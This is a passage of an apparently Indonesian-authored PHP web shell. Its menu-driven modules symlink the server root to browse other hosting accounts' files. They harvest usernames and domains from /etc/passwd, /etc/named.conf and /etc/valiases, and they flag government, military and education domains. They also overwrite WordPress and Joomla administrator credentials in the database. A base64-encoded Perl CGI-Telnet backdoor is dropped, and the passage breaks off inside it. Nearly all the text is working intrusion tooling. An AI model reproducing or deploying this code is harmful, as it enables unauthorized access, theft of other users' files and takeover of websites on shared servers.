  1337. @set_time_limit(0);
  1338. @ini_set('max_execution_time',0);
  1339. if($win){
  1340. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1341. }
  1342. @mkdir('dm1sym',0777);
  1343. $sempak = "Options all \n
  1344. DirectoryIndex dm.html \n
  1345. AddType text/plain .php \n
  1346. AddHandler server-parsed .php \n
  1347. AddType text/plain .html \n
  1348. AddHandler txt .html \n
  1349. Require None \n
  1350. Satisfy Any";
  1351. $masuk =@fopen ('dm1sym/.htaccess','w');
  1352. fwrite($masuk ,$sempak);
  1353. @symlink('/','dm1sym/dm.txt');
  1354. $pg = basename(__FILE__);
  1355.  
  1356.  
  1357. if(is_readable("/var/named")){
  1358. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">VAR/NAMED ]:=O</span></b></nobr><br/><br/></center>
  1359. <table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  1360. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  1361. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  1362. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
  1363. $list = scandir("/var/named");
  1364. foreach($list as $domain){
  1365. if(strpos($domain,".db")){
  1366. @error_reporting(0);
  1367. @ini_set('log_errors',0);
  1368. @ini_set('error_log',NULL);
  1369.  
  1370. $i += 1;
  1371. $domain = str_replace('.db','',$domain);
  1372. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1373. echo "<tr>
  1374. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  1375. <td align='center'><font color='white'>".$owner['name']."</td>
  1376. <td align='center'><a href='dm1sym/dm.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  1377. }
  1378. }
  1379. flush();
  1380. flush();
  1381. }
  1382. echo "</tr></table></div></html>";
  1383. }
  1384.  
  1385. # x=dmsym2
  1386. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym2')) {
  1387. @session_start();
  1388. @set_time_limit(0);
  1389. @error_reporting(0);
  1390. @ini_set('log_errors',0);
  1391. @ini_set('error_log',NULL);
  1392. @ini_set('max_execution_time',0);
  1393. if($win){
  1394. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1395. }
  1396. @mkdir('dm2sym',0777);
  1397. $sempak = "Options all \n
  1398. DirectoryIndex dm.html \n
  1399. AddType text/plain .php \n
  1400. AddHandler server-parsed .php \n
  1401. AddType text/plain .html \n
  1402. AddHandler txt .html \n
  1403. Require None \n
  1404. Satisfy Any";
  1405. $masuk =@fopen ('dm2sym/.htaccess','w');
  1406. fwrite($masuk ,$sempak);
  1407. @symlink('/','dm2sym/dm.txt');
  1408. $pg = basename(__FILE__);
  1409.  
  1410. if(is_readable("/etc/passwd-")){
  1411. $gelartiker = 'file_get_contents';
  1412. $seret = '/etc/passwd-';
  1413. $isikarung = $gelartiker($seret);
  1414. $buka = fopen('maho.txt', 'w');
  1415. fwrite($buka,$isikarung);
  1416. }
  1417.  
  1418. if(isset($_GET['file']) or @filesize('maho.txt') > 0) {
  1419. $cont = stripcslashes($_POST['file']);
  1420. if(!file_exists('maho.txt')){
  1421. $f = @fopen('maho.txt','w');
  1422. $w = @fwrite($f,$cont);
  1423. fclose($f);
  1424. }
  1425. if($w or @filesize('maho.txt') > 0){
  1426. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ SYMLINK</span> <span class='b8'>ETC/PASSWD- ]:=O</span></b></nobr><br/><br/><table align='center' border='3' width='400' cellspacing='0' cellpadding='0'>
  1427. <td align='center'> <font color='white'> <b>_USERS_</b></td>
  1428. <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
  1429. flush();
  1430. $fil3 = file('maho.txt');
  1431. foreach ($fil3 as $f){
  1432. $u=explode(':', $f);
  1433. $user = $u['0'];
  1434. echo "<tr>
  1435. <td align='center'><font color='white'>$user</td>
  1436. <td align='center'><a class='dm' href='dm2sym/dm.txt/home/$user/public_html' target='_blank'>Symlink</a></td></tr>";
  1437. flush();
  1438. flush();
  1439. }
  1440. echo "</tr></table></div></html>";
  1441. }
  1442. }
  1443. }
  1444.  
  1445. # x=dmsym3
  1446. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym3')) {
  1447. @session_start();
  1448. @set_time_limit(0);
  1449. @error_reporting(0);
  1450. @ini_set('log_errors',0);
  1451. @ini_set('error_log',NULL);
  1452. @ini_set('max_execution_time',0);
  1453. if($win){
  1454. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1455. }
  1456. @mkdir('dm3sym',0777);
  1457. $sempak = "Options all \n
  1458. DirectoryIndex dm.html \n
  1459. AddType text/plain .php \n
  1460. AddHandler server-parsed .php \n
  1461. AddType text/plain .html \n
  1462. AddHandler txt .html \n
  1463. Require None \n
  1464. Satisfy Any";
  1465. $masuk =@fopen ('dm3sym/.htaccess','w');
  1466. fwrite($masuk ,$sempak);
  1467. @symlink('/','dm3sym/dm.txt');
  1468. $pg = basename(__FILE__);
  1469.  
  1470. $etc = file_get_contents("/etc/passwd");
  1471. $etcz = explode("\n",$etc);
  1472. if(is_readable("/etc/passwd")){
  1473. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/PASSWD ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
  1474. echo'<tr>
  1475. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  1476. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  1477. <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
  1478.  
  1479. $list = scandir("/var/named");
  1480. foreach($etcz as $etz){
  1481. $etcc = explode(":",$etz);
  1482. foreach($list as $domain) {
  1483. if(strpos($domain,".db")) {
  1484. $domain = str_replace('.db','',$domain);
  1485. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1486. if($owner['name'] == $etcc[0]){
  1487. $i += 1;
  1488. echo "<tr>
  1489. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  1490. <td align='center'><font color='white'>".$owner['name']."</font></td>
  1491. <td align='center'><a href='dm3sym/dm.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  1492. } } } }
  1493. flush();
  1494. flush();
  1495. }
  1496. echo "</tr></table></div></html>";
  1497.  
  1498. }
  1499.  
  1500. # x=dmsym4
  1501. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym4')) {
  1502. @session_start();
  1503. @set_time_limit(0);
  1504. @error_reporting(0);
  1505. @ini_set('log_errors',0);
  1506. @ini_set('error_log',NULL);
  1507. @ini_set('max_execution_time',0);
  1508. if($win){
  1509. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1510. }
  1511. @mkdir('dm4sym',0777);
  1512. $sempak = "Options all \n
  1513. DirectoryIndex dm.html \n
  1514. AddType text/plain .php \n
  1515. AddHandler server-parsed .php \n
  1516. AddType text/plain .html \n
  1517. AddHandler txt .html \n
  1518. Require None \n
  1519. Satisfy Any";
  1520. $masuk =@fopen ('dm4sym/.htaccess','w');
  1521. fwrite($masuk ,$sempak);
  1522. @symlink('/','dm4sym/dm.txt');
  1523. $pg = basename(__FILE__);
  1524.  
  1525. if(is_readable("/etc/named.conf")){
  1526. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/NAMED.CONF ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
  1527. echo '<tr>
  1528. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  1529. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  1530. <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
  1531. $named = file_get_contents("/etc/named.conf");
  1532. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1533. foreach($domains[1] as $domain){
  1534. $domain = trim($domain);
  1535. $i += 1;
  1536. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1537. echo "<tr>
  1538. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  1539. <td align='center'><font color='white'>".$owner['name']."</font></td>
  1540. <td align='center'><a href='dm4sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a></td>";
  1541. }
  1542. flush();
  1543. flush();
  1544. }
  1545. echo "</tr></table></div></html>";
  1546.  
  1547. }
  1548.  
  1549. # x=dmsym5
  1550. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym5')) {
  1551. @session_start();
  1552. @set_time_limit(0);
  1553. @error_reporting(0);
  1554. @ini_set('log_errors',0);
  1555. @ini_set('error_log',NULL);
  1556. @ini_set('max_execution_time',0);
  1557. if($win){
  1558. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1559. }
  1560. @mkdir('dm5sym',0777);
  1561. $sempak = "Options all \n
  1562. DirectoryIndex dm.html \n
  1563. AddType text/plain .php \n
  1564. AddHandler server-parsed .php \n
  1565. AddType text/plain .html \n
  1566. AddHandler txt .html \n
  1567. Require None \n
  1568. Satisfy Any";
  1569. $masuk =@fopen ('dm5sym/.htaccess','w');
  1570. fwrite($masuk ,$sempak);
  1571. @symlink('/','dm5sym/dm.txt');
  1572. $pg = basename(__FILE__);
  1573. $read_named_conf = @file('/etc/named.conf');
  1574. if(!$read_named_conf) {
  1575. echo "<center><br/><br/><nobr><span class='b9'>Can't Read File etc/named.conf :(</span></nobr><br/><br/>";
  1576. } else {
  1577. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ SYMLINK</span> <span class='b8'>ETC/NAMED.CONF II ]:=O</span></b></nobr><br/><br/> <table border='3' bordercolor='#FF0000' width='400' cellpadding='1' cellspacing='0'>
  1578. <td align='center'> <font color='white'> <b>_DOMAINS_</b></td>
  1579. <td align='center'> <font color='white'> <b>_USERS_</b></td>
  1580. <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
  1581. foreach($read_named_conf as $subject){
  1582. if(eregi('zone',$subject)){
  1583. preg_match_all('#zone"(.*)"#',$subject,$string);
  1584. flush();
  1585. if(strlen(trim($string[1][0])) >2){
  1586. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1587. $name = $UID['name'] ;
  1588. @symlink('/','dm5sym/dm.txt');
  1589. $name = $string[1][0];
  1590. $australia = '\.au';
  1591. $bangladesh = '\.bd';
  1592. $brazil ='\.br';
  1593. $malaysia = '\.my';
  1594. $myanmar = '\.mm';
  1595. $indonesia = '\.id';
  1596. $israel = '\.il';
  1597. $romania = '\.ro';
  1598. $edu = '\.edu';
  1599. $gov = '\.gov';
  1600. $go = '\.go';
  1601. $gob = '\.gob';
  1602. $mil = '\.mil';
  1603. if (eregi("$australia",$string[1][0]) or eregi("$bangladesh",$string[1][0]) or eregi("$brazil",$string[1][0]) or eregi("$malaysia",$string[1][0])or eregi("$myanmar",$string[1][0]) or eregi ("$indonesia",$string[1][0]) or eregi ("$israel",$string[1][0]) or eregi ("$romania",$string[1][0]) or eregi("$edu",$string[1][0]) or eregi("$gov",$string[1][0]) or eregi("$go",$string[1][0]) or eregi("$gob",$string[1][0]) or eregi("$mil",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  1604. { $name = "<div style=' color:yellow ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>'; }
  1605. echo "<tr>
  1606. <td><a class='dm' target='_blank' href=http://".$string[1][0].'/>'.$name.' </a></center></div></td>
  1607. <td align=center><font color=white>'.$UID['name']."</td>
  1608. <td align=center><a href='dm5sym/dm.txt/home/".$UID['name']."/public_html/' target='_blank'>Symlink </a></td></tr>";
  1609. flush();
  1610. }}}}
  1611. flush();
  1612. flush();
  1613. echo "</tr></table></div></html>";
  1614.  
  1615. }
  1616.  
  1617. # x=dmsym6
  1618. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym6')) {
  1619. @session_start();
  1620. @set_time_limit(0);
  1621. @error_reporting(0);
  1622. @ini_set('log_errors',0);
  1623. @ini_set('error_log',NULL);
  1624. @ini_set('max_execution_time',0);
  1625. if($win){
  1626. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1627. }
  1628. @mkdir('dm6sym',0777);
  1629. $sempak = "Options all \n
  1630. DirectoryIndex dm.html \n
  1631. AddType text/plain .php \n
  1632. AddHandler server-parsed .php \n
  1633. AddType text/plain .html \n
  1634. AddHandler txt .html \n
  1635. Require None \n
  1636. Satisfy Any";
  1637. $masuk =@fopen ('dm5sym/.htaccess','w');
  1638. fwrite($masuk ,$sempak);
  1639. @symlink('/','dm6sym/dm.txt');
  1640. $pg = basename(__FILE__);
  1641. if(is_readable("/etc/valiases")){
  1642. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/VALIASES ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="300" cellspacing="0" cellpadding="4">';
  1643. echo '<tr>
  1644. <td align="center"><font color="white"> <b>_DOMAINS_</b></td>
  1645. <td align="center"><font color="white"> <b>_USERS_</b></td>
  1646. <td align="center"><font color="white"> <b>SYMLINK</b></td>';
  1647. $list = scandir("/etc/valiases");
  1648. foreach($list as $domain){
  1649. $i += 1;
  1650. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1651. echo "<tr>
  1652. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  1653. <td align='center'><font color='white'>".$owner['name']."</font></td>
  1654. <td align='center'><a href='dm6sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a>/td>";
  1655. }
  1656. flush();
  1657. flush();
  1658. }
  1659. echo "</tr></table></div></html>";
  1660. }
  1661.  
  1662. # x=wp3
  1663. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp3')) {
  1664.  
  1665. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  1666.  
  1667. if(empty($_POST['pwd'])){
  1668. echo "<FORM method='POST'>
  1669. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  1670. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  1671. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  1672. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  1673. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  1674. <tr><td>&nbsp;&nbsp;User baru</td><td>
  1675. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  1676. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  1677. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
  1678.  
  1679. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1680. </td></tr> </table><br><br><br><br>
  1681. ";
  1682. }else{
  1683. $localhost = $_POST['localhost'];
  1684. $database = $_POST['database'];
  1685. $username = $_POST['username'];
  1686. $password = $_POST['password'];
  1687. $pwd = $_POST['pwd'];
  1688. $admin = $_POST['admin'];
  1689. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1690. @mysql_select_db($database) or die(mysql_error());
  1691.  
  1692. $hash = crypt($pwd);
  1693. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  1694. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  1695. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  1696. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  1697. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  1698. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  1699. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  1700. if($a4s){
  1701. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1702. }
  1703. }
  1704. echo "</div>";
  1705. }
  1706.  
  1707. # x=jm4
  1708. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm4')) {
  1709.  
  1710. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  1711. if(empty($_POST['pwd'])){
  1712. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  1713. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  1714. <tr><td>&nbsp;&nbsp;Database</td><td>
  1715. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  1716. <tr><td>&nbsp;&nbsp;username</td><td>
  1717. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  1718. <tr><td>&nbsp;&nbsp;password</td><td>
  1719. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  1720. <tr><td>&nbsp;&nbsp;New User</td><td>
  1721. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  1722. <tr><td>&nbsp;&nbsp;New Pass </td>
  1723. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  1724. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1725. </td></tr></table><br>";
  1726. } else {
  1727. $localhost = $_POST['localhost'];
  1728. $database = $_POST['database'];
  1729. $username = $_POST['username'];
  1730. $password = $_POST['password'];
  1731. $pwd = $_POST['pwd'];
  1732. $admin = $_POST['admin'];
  1733. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1734. @mysql_select_db($database) or die(mysql_error());
  1735. $hash = crypt($pwd);
  1736. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  1737. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  1738. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  1739. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  1740. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  1741. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  1742. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  1743. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  1744. if($SQL){
  1745. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1746. }
  1747. }
  1748. echo "</div>";
  1749. }
  1750. # x=cgi2012
  1751. elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi2012')) {
  1752. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ CGI TELNET</span> <span class='b8'> 2012 ]:=O</span></b></nobr><br/><br/> ";
  1753. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='telnet/telnet.cok' target='_blank'>[+] HERE [+]</a></center></span></br>";
  1754. mkdir('telnet', 0755);
  1755. chdir('telnet');
  1756. $htcok = ".htaccess";
  1757. $htaccesscok = "$htcok";
  1758. $file = fopen($htaccesscok , 'w');
  1759. $cacad = "AddHandler cgi-script .cok";
  1760. fwrite ($file ,$cacad);
  1761. fclose ($file);
  1762. $cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFZlcnNpb24gMS4zIjsNCiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+RE1fWk9ORTwvZm9udD4iOw0KDQokUGFzc3dvcmQgPSAiYW51IjsJCQkNCgkJCQkNCnN1YiBJc19XaW4oKXsNCgkkb3MgPSAmdHJpbSgkRU5WeyJTRVJWRVJfU09GVFdBUkUifSk7DQoJaWYoJG9zID1+IG0vd2luL2kpew0KCQlyZXR1cm4gMTsNCgl9DQoJZWxzZXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KJFdpbk5UID0gJklzX1dpbigpOwkJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3JpcHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91DQoJCQkJCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJCQkJCQkJCSMgdXNlZnVsIGZvciBjb21tYW5kcyB0aGF0IG1heSBoYW5nIG9yIHRoYXQNCgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCQkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJCQkJCSMgaWdub3JlZCBvbiBOVCBTZXJ2ZXJzLg0KDQokU2hvd0R5bmFtaWNPdXRwdXQgPSAxOwkJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBvdGhlcndpc2UNCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kDQoJCQkJCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCQkJCQkjIHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4NCg0KIyBET04nVCBDSEFOR0UgQU5ZVEhJTkcgQkVMT1cgVEhJUyBMSU5FIFVOTEVTUyBZT1UgS05PVyBXSEFUIFlPVSdSRSBET0lORyAhIQ0KDQokQ21kU2VwID0gKCRXaW5OVCA/ICROVENtZFNlcCA6ICRVbml4Q21kU2VwKTsNCiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsNCiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOw0KJFJlZGlyZWN0b3IgPSAoJFdpbk5UID8gIiAyPiYxIDE+JjIiIDogIiAxPiYxIDI+JjEiKTsNCiRjb2xzPSAxNTA7DQokcm93cz0gMjY7DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZpbGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRpbnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOw0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0NCgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUoU1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9